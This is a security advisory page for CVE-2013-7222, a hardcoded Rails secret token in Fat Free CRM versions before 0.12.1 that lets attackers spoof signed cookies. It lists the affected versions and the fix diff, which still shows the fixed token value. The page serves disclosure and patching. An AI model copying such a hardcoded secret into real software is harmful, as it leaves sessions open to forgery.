VYPR
← All advisories
Moderate severityNVD Advisory· Published Jan 2, 2014· Updated Apr 29, 2026

CVE-2013-7222

CVE-2013-7222

Description

config/initializers/secret_token.rb in Fat Free CRM before 0.12.1 has a fixed FatFreeCRM::Application.config.secret_token value, which makes it easier for remote attackers to spoof signed cookies by referring to the key in the source code.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
fat_free_crmRubyGems
< 0.12.10.12.1

Affected products

10
  • Fatfreecrm/Fat Free CRM10 versions
    cpe:2.3:a:fatfreecrm:fat_free_crm:*:*:*:*:*:*:*:*+ 9 more
    • cpe:2.3:a:fatfreecrm:fat_free_crm:*:*:*:*:*:*:*:*range: <=0.12.0
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.10.1:*:*:*:*:*:*:*
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.11.0:*:*:*:*:*:*:*
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.11.1:*:*:*:*:*:*:*
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.11.2:*:*:*:*:*:*:*
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.10:*:*:*:*:*:*:*
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.6:*:*:*:*:*:*:*
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.7:*:*:*:*:*:*:*
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.8:*:*:*:*:*:*:*
    • cpe:2.3:a:fatfreecrm:fat_free_crm:0.9.9:*:*:*:*:*:*:*

Patches

1
93c182dd4c6f

Strengthen case to generate unique secret token.

https://github.com/fatfreecrm/fat_free_crmSteve KenworthyDec 27, 2013via ghsa
commit
2 files changed · +28 4
  • config/initializers/secret_token.rb+11 4 modified
    @@ -3,16 +3,23 @@
 # Fat Free CRM is freely distributable under the terms of MIT license.
 # See MIT-LICENSE file or http://www.opensource.org/licenses/mit-license.php
 #------------------------------------------------------------------------------
+
 # Be sure to restart your server when you modify this file.
 
-# Your secret key for verifying the integrity of signed cookies.
+# Your secret key is used for verifying the integrity of signed cookies.
 # If you change this key, all old signed cookies will become invalid!
+
 # Make sure the secret is at least 30 characters and all random,
 # no regular words or you'll be exposed to dictionary attacks.
+# You can use `rake secret` to generate a secure secret key.
 
-# PLEASE NOTE: This secret token must be changed in your fork of Fat Free CRM.
-# This problem is mitigated when running Fat Free CRM as a Rails Engine.
+# Make sure your secret_key_base is kept private
+# if you're sharing your code publicly.
 
 if defined?(FatFreeCRM::Application)
-  FatFreeCRM::Application.config.secret_token = '51aa366864a80316a85cff0d3762347f4ae3d029d548bef034d56e82b1a2ffac5353ee6719d9b64e4354e2a0b1a901679f46a851c360a2ea377188e4b196b6b6'
+  if Rails.env == 'test'
+    FatFreeCRM::Application.config.secret_token = '51aa366864a80316a85cff0d3762347f4ae3d029d548bef034d56e82b1a2ffac5353ee6719d9b64e4354e2a0b1a901679f46a851c360a2ea377188e4b196b6b6'
+  else
+    raise "Please run 'rake ffcrm:secret' to generate a secret token."
+  end
 end
  • lib/tasks/ffcrm/secret.rake+17 0 added
    @@ -0,0 +1,17 @@
+# Copyright (c) 2008-2013 Michael Dvorkin and contributors.
+#
+# Fat Free CRM is freely distributable under the terms of MIT license.
+# See MIT-LICENSE file or http://www.opensource.org/licenses/mit-license.php
+#------------------------------------------------------------------------------
+
+namespace :ffcrm do
+
+  desc "Generate a secret token for Rails to use."
+  task :secret do
+    require 'securerandom'
+    secret = SecureRandom.hex(64)
+    filename = File.join(Rails.root, 'config', 'initializers', 'secret_token.rb')
+    File.open(filename, 'w'){|f| f.puts "FatFreeCRM::Application.config.secret_token = '#{secret}'"}
+  end
+
+end

Vulnerability mechanics

Generated by null/stub on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

8

News mentions

0

No linked articles in our index yet.